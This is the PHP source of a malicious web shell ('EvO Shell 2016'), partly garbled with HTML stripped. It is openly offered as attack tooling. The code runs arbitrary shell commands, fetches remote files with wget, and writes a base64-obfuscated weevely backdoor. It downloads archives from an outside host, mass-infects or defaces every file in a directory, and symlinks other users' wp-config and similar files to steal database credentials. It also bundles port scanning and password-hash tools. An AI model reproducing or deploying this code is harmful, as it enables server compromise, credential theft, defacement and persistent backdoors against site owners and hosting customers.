EvO_Sy
'; ?>
";
if (empty($redirect)) {
echo "";
} else {
echo "";
}
}
function error($mesg) {
$error = "$mesg ";
echo "$error";
}
function ByteConversion($bytes, $precision = 2) {
$kilobyte = 1024;
$megabyte = $kilobyte * 1024;
$gigabyte = $megabyte * 1024;
$terabyte = $gigabyte * 1024;
if (($bytes >= 0) && ($bytes < $kilobyte)) {
return $bytes . ' B';
} elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
return round($bytes / $kilobyte, $precision) . ' KB';
} elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
return round($bytes / $megabyte, $precision) . ' MB';
} elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
return round($bytes / $gigabyte, $precision) . ' GB';
} elseif ($bytes >= $terabyte) {
return round($bytes / $terabyte, $precision) . ' TB';
} else {
return $bytes . ' B';
}
}
//Mass File Function :: Secret Hack Was here :: don't steal this codes :3 :(
function files($mass_dir) {
if ($dh = opendir($mass_dir)) {
$files = array();
$inner_files = array();
while ($file = readdir($dh)) {
if ($file != "." && $file != ".." && $file[0] != '.') {
if (is_dir($mass_dir . "/" . $file)) {
$inner_files = files("$mass_dir/$file");
if (is_array($inner_files)) $files = array_merge($files, $inner_files);
} else {
array_push($files, "$mass_dir/$file");
}
}
}
closedir($dh);
return $files;
}
}
//Upload File
if (isset($_POST['do_upload_file'])) {
$udir = $_POST['upload_location'];
$uname = $_FILES['upload_file']['name'];
$both = "$udir$uname";
if (file_exists($both)) {
success("file_exists", $both);
} else {
switch ($_FILES['upload_file']['error']) {
case 0:
if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
success("file_uploaded");
} else {
error("Failed To Upload File!");
}
}
}
}
//wget file
if (isset($_POST['do_wget_file'])) {
$wget_file = $_POST['wget_file'];
$wecmd = "wget $wget_file";
$wget_ecmd = cmd2($wecmd, $dir);
echo "
Result:
";
}
//Execute command
function cmd2($cmd, $path) {
chdir($path);
$disabled = ini_get('disable_functions');
if (empty($disabled)) {
$disabled = "None";
}
if ($disabled == "None") {
$execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
$res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($execute);
return $res;
} elseif (function_exists("proc_open")) {
$execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
$res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($execute);
return $res;
} elseif (function_exists("exec")) {
$res = exec($cmd);
return $res;
} elseif (function_exists("system")) {
$res = system($cmd);
return $res;
} elseif (function_exists("shell_exec")) {
$res = shell_exec($cmd);
return $res;
} elseif (function_exists("passthru")) {
$res = passthru($cmd);
return $res;
} else {
error("The necessary functions to execute commands are disabled!");
}
}
//Unzip function
function unzip($filename, $directory) {
$zip = new ZipArchive;
$res = $zip->open($filename);
if ($res === TRUE) {
$zip->extractTo($directory);
$zip->close();
success("unzip", $directory);
} else {
cmd2("unzip $filename", $directory);
}
}
//Get files and directories and throw them into an array.
$open = opendir($dir);
$files = array();
$direcs = array();
while ($file = readdir($open)) {
if ($file != "." && $file != "..") {
if (is_dir("$dir/$file")) {
array_push($direcs, $file);
} else {
array_push($files, $file);
}
}
}
asort($direcs);
asort($files);
?>
EvO Shell 2016
[+] نحــن نقتــل الحــمايـة[+]
';
?>
Priv8 Shell By Secret HaCk ::SDN::
uname server_ip your_ip server_software disabled_functions ".php_uname() ;?> ".gethostbyname($_SERVER["HTTP_HOST"]);?>
";
}
if (isset($_POST['do_encrypt'])) {
$vbsalt = gen_salt("30");
$vbsalt2 = gen_salt("3");
$mybbsalt = gen_salt("8");
$ipbsalt = gen_salt("5");
$joomlasalt = gen_salt("32");
$password = $_POST['en_string'];
$md5 = md5($password);
$md52 = md5(md5($password));
$md53 = md5(md5(md5($password)));
$sha1 = sha1($password);
$sha256 = hash('sha256', $password);
$vbalg = md5(md5($password) . $vbsalt);
$vbalg2 = md5(md5($password) . $vbsalt2);
$mybbalg = md5(md5($mybbsalt) . $password);
$ipbalg = md5(md5($ipbsalt) . md5($password));
$joomlaalg = md5($password . $joomlasalt);
$en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
echo "
";
}
?>
Port Scan:
";
}
if (isset($_POST['start_scan'])) {
$scanhost = $_POST['scan_host'];
$startport = $_POST['start_port'];
$endport = $_POST['end_port'];
while ($startport <= $endport) {
if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
echo "
Port $startport is open on $scanhost ";
} else {
echo "
Port $startport is not open on $scanhost ";
}
$startport++;
}
}
?>
";
if (file_exists($edfile)) {
if (get_magic_quotes_gpc()) {
$file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
} else {
$file_content = htmlspecialchars(file_get_contents($edfile));
}
if (is_writeable($edfile)) {
echo "
";
if (isset($_POST['savedit'])) {
if (get_magic_quotes_gpc()) {
$edfilecontent = stripslashes($_POST['edfile_contents']);
} else {
$edfilecontent = $_POST['edfile_contents'];
}
if (file_put_contents($edfile, $edfilecontent)) {
success("filesave", rtrim($redirectloc, "/"));
} else {
error("Failed to save file!");
}
} else if (isset($_POST['deletefile'])) {
if (unlink($edfile)) {
success("filedelete", rtrim($redirectloc, '/'));
} else {
error("Failed to delete file!");
}
}
} else {
echo "
File is read only!
";
}
echo "";
} else {
echo "
";
if (isset($_POST['savefile'])) {
if (get_magic_quotes_gpc()) {
$newfilecontent = stripslashes($_POST['newfile_contents']);
} else {
$newfilecontent = $_POST['newfile_contents'];
}
if (file_put_contents($edfile, $newfilecontent)) {
success("filesave", rtrim($redirectloc, "/"));
} else {
error("Failed to save file!");
}
}
}
}
?>
Directory to install weevely backdoor:
Name of file (something .php):
Password (more than 3 characters):
";
}
if (isset($_POST['install_weev'])) {
$weevdir = rtrim($_POST['weev_dir'], '/');;
$weevname = $_POST['weev_name'];
$weevpassword = $_POST['weev_pass'];
if (strlen($weevpassword) < 3) {
error("Password must be longer than 3 characters!");
} else {
$first2 = $weevpassword[0] . $weevpassword[1];
$rest = substr($weevpassword, 2);
$money = "$";
$weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
$weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
$weevelybd3 = "$money" . "k='$rest';";
$weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
$all = "";
if (file_put_contents($weevdir . '/' . $weevname, $all)) {
echo "
Usage: weevely [URL of backdoor] [password] ";
success("weevely");
} else {
error("Failed to write backdoor to $weevdir");
}
}
}
?>
";
$dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
$num = 0;
$count = sizeof($dns_record);
echo "
";
while ($num < $count) {
$name_servers = $dns_record[$num];
$name_servers2 = $name_servers['type'];
$name_servers3 = @$name_servers['target'];
$num++;
if ($name_servers2 == "NS") {
echo "$name_servers3
";
$nshost = @$name_servers['host'];
}
if ($name_servers2 == "SOA") {
$nsemail = $name_servers['rname'];
}
if ($name_servers2 == "A") {
$nsip = $name_servers['ip'];
}
}
$num = 0;
echo "
";
$domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
$status = $domains_on_server->status;
$message = $domains_on_server->message;
$domainAr = $domains_on_server->domainArray;
$num_of_site = $domains_on_server->domainCount;
$count = sizeof($domainAr);
if ($status == "Success") {
echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via
www.yougetsignal.com :
";
while ($num < $count) {
$hossites = $domainAr[$num];
$num++;
$hossites3 = $domainAr[$num];
$hossites3 = $hossites3[0];
$hossites = $hossites[0];
$site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
$site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
echo "$hossites $site_ips$hossites3 $site_ips2 ";
$num++;
}
echo "
";
$num = 0;
} else {
error("Iam not Happy because i Failed to find or get sites hosted on same server from:
www.yougetsignal.com !
Additional Message:
$message");
}
echo "
";
}
?>
Successfully sent $sent_success messages.
Failed to send $sent_fail messages.
";
}
}
if (isset($_GET['sms'])) {
echo "
Message Content:
";
}
?>
Install MySQL Dumper v2.0 By: Plum
Install MySQL Dumper v1.24.4 (Original MSD)
";
}
//MSD 1 stuff
if (isset($_GET['msd1'])) {
echo "
Directory to install to:
If directory does not exist it will attempt to create it.
";
}
if (isset($_POST['installmsd1'])) {
$msd1dir = rtrim($_POST['msd1dir'], "/");
$msd1dir2 = "$msd1dir/msdv2.zip";
if (!is_dir($msd1dir)) {
if (!mkdir($msd1dir, 0777)) {
error("Failed to make directory $msd1dir");
}
}
$link = file_get_contents("http://p0wersurge.com/msdv2.zip");
if (file_put_contents($msd1dir2, $link)) {
unzip($msd1dir2, $msd1dir);
} else {
error("Could not write to $msd1dir");
}
}
//MSD 2 stuff
if (isset($_GET['msd2'])) {
echo "
Directory to install to:
If directory does not exist it will attempt to create it.
";
}
if (isset($_POST['installmsd2'])) {
$msd2dir = rtrim($_POST['msd2dir'], "/");
$msd2dir2 = "$msd2dir/msd.zip";
if (!is_dir($msd2dir)) {
if (!mkdir($msd2dir, 0777)) {
error("Failed to make directory $msd2dir");
}
}
$link = file_get_contents("http://p0wersurge.com/msd.zip");
if (file_put_contents($msd2dir2, $link)) {
unzip($msd2dir2, $msd2dir);
} else {
error("Could not write to $msd2dir");
}
}
?>
$file) {
$file2 = trim($file, ".");
$getinf_file = file_get_contents($file2);
if ("$file2" == "$dir/$script2") {
echo "";
} else {
if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
echo "
Successfully infected file: $file2 ";
$success++;
} else {
echo "
Failed to infect file : $file2 ";
$failed++;
}
}
}
echo "
$success files successfully infected! ^_^ Failed to infect $failed files! :( ";
}
}
if (isset($_GET['massinfect'])) {
$example = "";
$example = htmlspecialchars($example);
$example2 = "";
$example2 = htmlspecialchars($example2);
echo "
Directory to start infect from:
Root
Custom
Custom Directory:
This is great for infecting mass files with javascript scripts or php scripts
It will append the code to the top of each file.
Example:
$example
$example2
Infect code:
This will not infect this shell.
";
}
?>
$file) {
$file2 = trim($file, ".");
if ("$file2" == "$dir/$script2") {
echo "";
} else {
if (file_put_contents("$file2", $mass_source)) {
echo "
Successfully defaced file: $file2 ";
$success++;
} else {
echo "
Failed to deface file: $file2 ";
$failed++;
}
}
}
echo "
$success files successfully defaced! Failed to deface $failed files! ";
}
}
if (isset($_GET['massdeface'])) {
echo "
Directory to start deface from:
Root
Custom
Custom Directory:
Source of deface:
This will not deface this shell.
";
}
?>
Current Directory: ";
$ex = explode("/", $dir);
for ($p = 0;$p < count($ex);$p++) {
@$linkpath.= $ex[$p] . '/';
$linkpath2 = rtrim($linkpath, "/");
echo "$ex[$p] /";
}
echo "
";
echo "
With all selected:
Delete
chmod
";
echo "";
closedir();
?>
[ Writeable ] " : "
[ Non Writeable ] ";
echo "
Create directory:
$wr
Create file:
$wr
Go to directory:
Edit file:
Upload to location:
$wr
upload from link :
";
?>
Symlink Killer ++
Click this button to Create PHP.ini
Click this button to find usernames to steal configurations
_<) \n \n Enjoy...";
fwrite($r,$rr);
$link="open this link in new tab to run PHP.INI ";
echo $link;
}
?>
";
if(isset($_POST['su']))
{
mkdir('secrethack',0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('secrethack/.htaccess','w');
fwrite($g,$rr);
$security = symlink("/","secrethack/root");
$rt=" Success ";
echo "Check link given below for / configs folder $rt ";
$dir=mkdir('SECRETHACK',0777);
$r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = fopen('SECRETHACK/.htaccess','w');
fwrite($f,$r);
$consym="configuration files ";
echo " The link given below for config files ... open it , once processing finish $consym ";
$usr=explode("\n",$_POST['user']);
$configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
foreach($usr as $uss )
{
$us=trim($uss);
foreach($configuration as $c)
{
$rs="/home/".$us."/public_html/".$c;
$r="SECRETHACK/".$us." .. ".$c;
symlink($rs,$r);
}
}
}
?>
Click this button to open manual symlink form
file link that you want symlink:-   file name with which you want represent symlink :- use .txt(owned.txt) or no extension(owned) for file which will represent symlink
File link for Symlink ".$dlink." link >>> is here ";
}
?>
Click this button To Get Configs
";
echo "check in this directory for configuration files once you have done with this scriptOpen Configuration File ";
}
?>
Symlink bypasser ( Use this tools if Cant read /etc/named )
Websites usernames symlink ";
foreach($webs as $f)
{
$str=substr_replace($f,"",-4);
$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
echo ""; flush();
}
}
?>
';
echo ' ';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload Success ^_^ '; }
else { echo 'Upload Failed :( '; }
}
?>
window.location = 'http://$domain$script?path=$godir'";
}
//Go Edit file
if (isset($_POST['do_go_edit'])) {
$gefile = $_POST['go_edit_file'];
if (file_exists($gefile)) {
header("Location: http://$domain$script?editfile=$gefile");
} else {
error("File does not exist!");
}
}
//Upload File
if (isset($_POST['do_upload_file'])) {
$udir = $_POST['upload_location'];
$uname = $_FILES['upload_file']['name'];
$both = "$udir$uname";
if (file_exists($both)) {
success("file_exists", $both);
} else {
switch ($_FILES['upload_file']['error']) {
case 0:
if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
success("file_uploaded");
} else {
error("Failed To Upload File!");
}
}
}
}
//Kill Shell >_<
if (isset($_GET['kill'])) {
if (unlink("$dir/$script2")) {
success("shell_killed");
} else {
error("Failed to kill shell!");
}
}
//Delete Directory
if (isset($_GET['deldir'])) {
$deldir = $_GET['deldir'];
$redir = dirname($deldir);
if (rmdir($deldir)) {
success("dir_del", rtrim($redir, '/'));
} else {
error("Failed to delete directory!");
}
}
//Rename Directory
if (isset($_GET['rendir'])) {
$rendir = $_GET['rendir'];
$dend = $_GET['old'];
echo "
";
}
if (isset($_POST['do_rename_dir'])) {
$newdir = $_POST['new_dir_name'];
$rendir = $_GET['rendir'];
$dend = $_GET['old'];
if (rename("$rendir/$dend", "$rendir/$newdir")) {
success("dir_renamed", $rendir);
} else {
error("Directory was not renamed!");
}
}
//Delete file
if (isset($_GET['delfile'])) {
$delfile = $_GET['delfile'];
$redir = dirname($delfile);
if (unlink($delfile)) {
success("filedelete", rtrim($redir, '/'));
} else {
error("Failed to delete file!");
}
}
//Rename File
if (isset($_GET['renfile'])) {
$renfile = $_GET['renfile'];
$fend = $_GET['old'];
echo "
";
}
if (isset($_POST['do_rename_file'])) {
$newfile = $_POST['new_file_name'];
$renfile = $_GET['renfile'];
$fend = $_GET['old'];
if (rename("$renfile/$fend", "$renfile/$newfile")) {
success("file_renamed", $renfile);
} else {
error("File was not renamed!");
}
}
//Mass Files Stuff
if (isset($_POST['mass_files'])) {
$action = $_POST['mass_action'];
$chmodvalue = $_POST['chmod_value'];
$box = $_POST['delbox'];
if ($action == "Delete") {
foreach ($box as $b) {
if (is_dir($b)) {
if (rmdir($b)) {
echo "Deleted Directory: $b ";
} else {
echo "Failed To Delete Directory: $b ";
}
} else {
if (unlink($b)) {
echo "Deleted File: $b ";
} else {
echo "Failed To Delete file: $b ";
}
}
}
}
if ($action == "chmod") {
foreach ($box as $b) {
if (is_dir($b)) {
if (chmod($b, $chmodvalue)) {
echo "Changed Permissions Of Directory: $b ";
} else {
echo "Failed To Change Permissions Of Directory: $b ";
}
} else {
if (chmod($b, $chmodvalue)) {
echo "Changed Persmissions Of File: $b ";
} else {
echo " >_< Failed To Change Permissions Of File: $b ";
}
}
}
}
}
?>